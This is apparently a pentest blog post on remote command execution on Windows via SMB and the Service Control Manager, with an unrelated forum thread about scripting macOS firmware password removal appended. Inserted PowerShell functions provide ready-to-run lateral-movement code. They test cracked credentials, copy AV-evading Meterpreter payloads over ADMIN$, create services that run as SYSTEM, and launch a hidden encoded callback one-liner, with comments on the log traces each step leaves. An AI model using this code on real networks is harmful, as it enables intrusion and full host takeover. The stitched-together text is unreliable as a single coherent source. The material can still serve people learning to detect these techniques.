
In Part 1 I listed some common tools and techniques for using domain credentials to execute commands on Windows machines from Kali Linux. In this post, I'm going to delve a little into how those tools actually work by re-creating the techniques from a Windows machine. All of the tools mentioned in the previous post (psexec, smbexec, etc.) are essentially re-implementations of core Windows functionality, and every technique can be used natively from within Windows.

A lot of pentesters, myself included, have used the psexec techniques extensively, but until recently I never fully understood what was going on under the hood.

Hopefully this post will shed some light on PsExec by manually re-creating the technique using native Windows tools.

The attacking box in this post is a Windows machine. It is not domain joined; it just sits on the same network. And as a reminder, we have recovered or cracked a single domain user's account (jarrieta). There are a few ways you can test credentials against a machine from Windows, but for demonstration purposes I'm going to use the basic net commands.

This isn't the best or stealthiest way to do it, but it's easy to follow and understand. An easy way to test credentials is to try to initiate an SMB connection to the machine. This is essentially what Metasploit's smb_login module does. In Windows, you can use the net use command with credentials to establish an SMB connection with a host. Connecting to an administrative share such as C$ also tells us whether the account is a local admin: if the command completes successfully, the credentials are good and the user is an admin; if we weren't an admin, we'd see an access denied. We can see which connections we have open by issuing a net use command by itself. Now one of the problems with this technique is that we have established connections with the Windows hosts that can be detected.

If an administrator on ordws01 ran a net session command, he or she would see a connection open from our attacking box. The other problem is that we can't pass a username and password to all of the net commands and other Windows tools.

Using 'runas' to get Kerberos auth

But we can bypass that limitation. The Windows runas command lets us execute commands in the context of another user. We can launch an interactive command prompt by running cmd.exe through runas with the /netonly switch and the domain user's credentials (our box isn't domain joined, so /netonly is what lets Windows use those credentials for network authentication while keeping our local token). The beauty of this technique is that our LogonId changes, and we can actually start using Kerberos auth on the domain. Note how the whoami output is the same but our LogonId changes in the new command prompt after doing a runas. In this new command prompt, we don't need to run the net use command to open connections with specified credentials.

We can just use normal commands and Windows will use our LogonId with Kerberos authentication. From this command prompt we are essentially "on the domain" and can start running native Windows commands with the privileges of jarrieta.
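The credential check and the runas step above, as an added PowerShell example that is not part of the original post. It assumes a domain named CORP, a target named ORDWS01 (the post's ordws01) and the post's user jarrieta; it connects to the C$ admin share so that a valid but non-admin credential is reported as access denied, tears the SMB session down again so it no longer shows up in net session on the target, and then opens the runas /netonly prompt (runas always asks for the password interactively; it cannot be passed on the command line):

```powershell
# Added example, not the original post's commands.
# Assumptions: domain CORP, target ORDWS01, user jarrieta.
$Domain   = 'CORP'
$Target   = 'ORDWS01'
$User     = 'jarrieta'
$Password = Read-Host -Prompt "Password for $Domain\$User"   # plaintext: it goes on the net use command line

function Test-AdminShareCredential {
    param([string]$Target, [string]$Domain, [string]$User, [string]$Password)
    # C$ is an administrative share. A valid non-admin credential gets
    # "System error 5" (access denied); a bad password gets "System error 1326".
    $out = & net use "\\$Target\C`$" /user:"$Domain\$User" $Password 2>&1 | Out-String
    $ok  = ($LASTEXITCODE -eq 0)
    if ($ok) {
        # net use leaves an SMB session that 'net session' on the target can list,
        # so drop it as soon as we have the answer.
        & net use "\\$Target\C`$" /delete /y | Out-Null
    }
    [pscustomobject]@{ Target = $Target; Admin = $ok; Message = $out.Trim() }
}

$result = Test-AdminShareCredential -Target $Target -Domain $Domain -User $User -Password $Password
$result | Format-List

if ($result.Admin) {
    # /netonly keeps our local token but creates a new logon session (new LogonId)
    # whose network credentials are CORP\jarrieta. Anything launched from this
    # cmd.exe authenticates to the domain with Kerberos, no /user: needed.
    & runas /netonly /user:"$Domain\$User" cmd.exe
}
```

Run the remaining steps of this post from the cmd.exe window that runas opens (or from a PowerShell started inside it), since that is the process tree that carries the new LogonId.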

In the last post, I used Metasploit's "psexec" module and Impacket's psexec script. Both of these tools are based on a classic Windows utility named, shockingly, PsExec. From the TechNet article: PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.

It's a standalone binary that's included in the Sysinternals suite. You can pass credentials to it and remotely execute commands or drop into an interactive command prompt. If you run it from the "runas" command prompt, which has a Kerberos TGT, you don't even need to specify credentials. When you start PsExec, you may notice a status line saying that it is starting the PSEXESVC service on the target. This might clue you in a little as to how PsExec actually operates.

In fact, if we go on the target machine and view services while the command prompt is open, we can see it: a service named PSEXESVC. Its binary is the PSEXESVC.exe that PsExec copied into the target's ADMIN$ share (C:\Windows). So PsExec performs a few steps to get you a shell: it connects to ADMIN$ with your credentials and copies its service executable there, registers a service pointing at that executable through the Service Control Manager, starts it, and then talks to the running service over named pipes to relay your command's input and output; when you exit, it stops and deletes the service. This is precisely how the Metasploit module and the Impacket script operate as well. We can also manually recreate the steps to remotely start any other binary of our choice, e.g. a Meterpreter payload.

Manually PsExec'ing

First let's assume we have a payload executable we generated with msfvenom and obfuscated with Veil so AV doesn't flag it. We copy it up to the target over the ADMIN$ share; really though, it could be copied and hidden anywhere on the filesystem. The Windows sc command is used to query, create, delete, etc. Windows services and can be used remotely against another host. From our command prompt, we'll remotely create a service called "meterpreter" that points to our uploaded binary. The last step is to start the service and execute the binary. sc will report that the service failed to start.

That's because our meterpreter binary isn't an actual service binary and never reports back to the Service Control Manager with the status it expects.

That's fine because we just need it to execute once to fire. If we look at our Metasploit listener, we'll see the session has been opened. After getting the meterpreter session, I'd migrate out of the meterpreter process right away, since the SCM terminates a process that never reports itself as a running service. Notice also that the session is running as SYSTEM. Why the sudden privilege escalation? It has to do with how services are created and started: unless you specify an account (the obj= and password= parameters of sc create), a service runs as LocalSystem, and the SCM starts it in that context regardless of which user registered it. If we really wanted to run the service with different credentials, we could have specified them when we created it, but if we can jump straight to SYSTEM, why would we want to?
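The manual PsExec procedure from the last few paragraphs (copy the binary, create the service, start it, clean up) as one added PowerShell function. This is example code, not the post's own command sequence; it assumes it is run from the runas /netonly prompt, a target named ORDWS01, a payload file .\met.exe produced elsewhere, the post's service name "meterpreter", and C:\Windows\Temp as the drop location. It treats the 1053 "did not respond" start error as the expected outcome and anything else as a real failure:

```powershell
# Added example, not the original post's code.
function Invoke-ManualPsExec {
    param(
        [string]$Target  = 'ORDWS01',     # assumption: the post's ordws01
        [string]$Payload = '.\met.exe',   # assumption: msfvenom/Veil payload built elsewhere
        [string]$SvcName = 'meterpreter'
    )
    $leaf      = Split-Path $Payload -Leaf
    $remoteDir = "\\$Target\ADMIN`$\Temp"            # ADMIN$ maps to C:\Windows on the target
    $localPath = "C:\Windows\Temp\$leaf"             # same file as seen by the target's SCM

    # 1. Drop the binary over SMB. PsExec does the same with PSEXESVC.exe.
    Copy-Item -Path $Payload -Destination $remoteDir -Force

    # 2. Register a service whose binPath is our payload. sc.exe parses 'option= value'
    #    (note the space after '='). No 'obj=' means it runs as LocalSystem: the SYSTEM shell.
    & sc.exe "\\$Target" create $SvcName binPath= $localPath start= demand | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "sc create failed with $LASTEXITCODE" }

    try {
        # 3. Start it. A plain executable never calls StartServiceCtrlDispatcher, so the SCM
        #    answers 1053 (did not respond in time) although the payload has already run.
        #    sc.exe exits with the Win32 error code of the failed call.
        $startOut = & sc.exe "\\$Target" start $SvcName 2>&1 | Out-String
        switch ($LASTEXITCODE) {
            0     { Write-Host "Service reported running (payload behaves as a real service)" }
            1053  { Write-Host "Expected: no service response, but the payload executed" }
            default { Write-Warning "Unexpected sc start result $LASTEXITCODE`n$startOut" }
        }
    }
    finally {
        # 4. Remove the service entry and try to remove the file (it fails while the payload
        #    still runs). The 7045 'service installed' event in the target's System log stays.
        & sc.exe "\\$Target" delete $SvcName | Out-Null
        Remove-Item -Path (Join-Path $remoteDir $leaf) -ErrorAction SilentlyContinue
    }
}

Invoke-ManualPsExec -Target 'ORDWS01' -Payload '.\met.exe'
```

The Copy-Item over ADMIN$ and every sc.exe call authenticate with the Kerberos ticket of the /netonly logon session, which is why no credentials appear in the function at all.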

One of the Impacket tools I used in the last post to get a semi-interactive shell is the smbexec script. This makes use of a really clever technique to execute commands and retrieve their output through SMB without needing to drop a binary on the system. Let's see what happens when smbexec runs by looking at it from the target's side. Obviously we could look at the source code, but this is more fun.

As a reminder, let's see what smbexec looks like when it's fired up: it reports that it is creating a service on the target (BTOBTO by default). But that service isn't present on the target machine when we do an sc query. The system logs reveal a clue to what happened: the System event log records a service installation (Event ID 7045) whose binary path isn't an executable at all but a cmd.exe one-liner. It echoes the command to be executed to a bat file, redirects stdout and stderr to a Temp file, then executes the bat file and deletes it.

Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary; it just executes each desired command as a new service.

Definitely more stealthy, but as we saw, an event log entry is created for every command executed. Still a very clever way to get a non-interactive "shell"!

Executing commands via services

As smbexec demonstrated, it's possible to execute commands directly from service binPaths instead of needing a binary. This can be a useful trick to keep in your back pocket if you just need to execute one arbitrary command on a target Windows machine. As a quick example, let's get a Meterpreter shell using a remote service without a binary.

The listener is set up and it tells us the command to execute on the target machine: a PowerShell one-liner. From our Windows attack box, we create a remote service "metpsh", set its binPath to cmd.exe /c followed by that one-liner, and then start it. It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed.

And we just launched a meterpreter payload remotely through a Windows service without dropping a binary. Which, by the way, is nothing revolutionary. This is exactly how Metasploit's psexec module executes payloads now. Only if PowerShell is not available, or you manually specify it, will Metasploit actually drop a binary on the target, which is good, since most AV detects Metasploit binaries now.
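The service-binPath trick from the smbexec section and the "metpsh" example above, as one added PowerShell function that is neither Impacket's code nor the post's own commands. It assumes the runas /netonly prompt, a target named ORDWS01, the output file C:\Windows\Temp\__output (hypothetical; any path readable through C$ works) and Impacket's default service name BTOBTO. Unlike smbexec it skips the intermediate bat file and puts the redirection straight into the binPath, then reads the result back over C$ and removes both the file and the service:

```powershell
# Added example, not Impacket's or the original post's code.
function Invoke-ServiceCommand {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][string]$Command,
        [string]$SvcName = 'BTOBTO',                       # Impacket's default; any name works
        [string]$OutFile = 'C:\Windows\Temp\__output'      # assumption: path on the target
    )
    # The target writes to a local path; we read the same file through the C$ share.
    $remoteOut = "\\$Target\C`$\" + $OutFile.Substring(3)

    # The whole string is the service "binary". The SCM launches it as LocalSystem and
    # cmd.exe performs the redirection, so stdout and stderr land in $OutFile.
    $binPath = "cmd.exe /Q /c $Command > $OutFile 2>&1"

    & sc.exe "\\$Target" create $SvcName binPath= $binPath start= demand | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "sc create failed with $LASTEXITCODE" }
    try {
        # 1053 is the normal answer here: cmd.exe is not a service and never reports back.
        & sc.exe "\\$Target" start $SvcName 2>&1 | Out-Null
        Start-Sleep -Seconds 2                             # let the command finish writing
        if (Test-Path $remoteOut) {
            Get-Content $remoteOut
            Remove-Item $remoteOut -Force
        } else {
            Write-Warning "No output file on $Target; the command may not have run"
        }
    }
    finally {
        # Every call installs and removes a service, so every call leaves a 7045
        # 'service installed' event plus a 7000/7009 start-failure pair in the System log.
        & sc.exe "\\$Target" delete $SvcName | Out-Null
    }
}

# Usage from the runas /netonly prompt. Each call is one round trip, like smbexec's shell.
Invoke-ServiceCommand -Target 'ORDWS01' -Command 'whoami /all'
Invoke-ServiceCommand -Target 'ORDWS01' -Command 'netstat -ano'

# The binary-less Meterpreter launch is the same call with the one-liner the Metasploit
# listener prints; the placeholder below stands in for that generated string.
$MsfOneLiner = 'powershell -nop -w hidden -e <base64 printed by the listener>'
# Invoke-ServiceCommand -Target 'ORDWS01' -Command $MsfOneLiner -SvcName 'metpsh'
```

Commands that need more than the SCM's start timeout (30 seconds by default) to finish should spawn their real work in the background, as the Metasploit one-liner does, because the SCM kills the cmd.exe process once it gives up waiting for a service response.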

In this post I walked through how Windows services can be used to remotely execute commands when you have credentials.

Hopefully this exposed some of the "magic" behind Metasploit's psexec module and Impacket's psexec and smbexec scripts. If you're ever on a pentest and don't have access to Kali, now you know how to use native Windows tools to replicate some of the behavior.

Hope this helped someone. Writing it and exploring these tools certainly helped me. Feel free to comment with questions or tell me where I'm wrong.


How to send a command with needed password in a shell script?

I want to write a script to disable the EFI password. I could use the jamf binary, I know, but I want the script to work even on machines without the jamf binary. I wanted to ask how I can run a command and send the needed password (in this case the firmware password) along with the command, so there would be no prompt in the Terminal. With the last line I tried to give the EFI password to the "firmwarepasswd -verify" command, but as it did not work out, I think this is completely wrong.

And the "-verify" is only for testing right now; I know the correct option would be "-delete".

Hi, thanks for your answer. This looks interesting, but it's based on the JSS. I want to write a solution that works completely without the JSS or the jamf binary.

I was thinking of using the "expect" and "send" commands, but I'm not capable of using them correctly.

Sorry, I read your post too quickly and expected an FAQ. Yes, if that command line tool doesn't support sending the password via a command line parameter, then you'll need the expect command.

Assuming it prompts for a password. I don't know what the output of that command looks like.

Unfortunately it still won't work. It asks for the admin password, it asks for the EFI password, but it is not able to "enter" this EFI password automatically without asking the user in the terminal for it.

It's not simple, but it does work.

I'm still working on this.
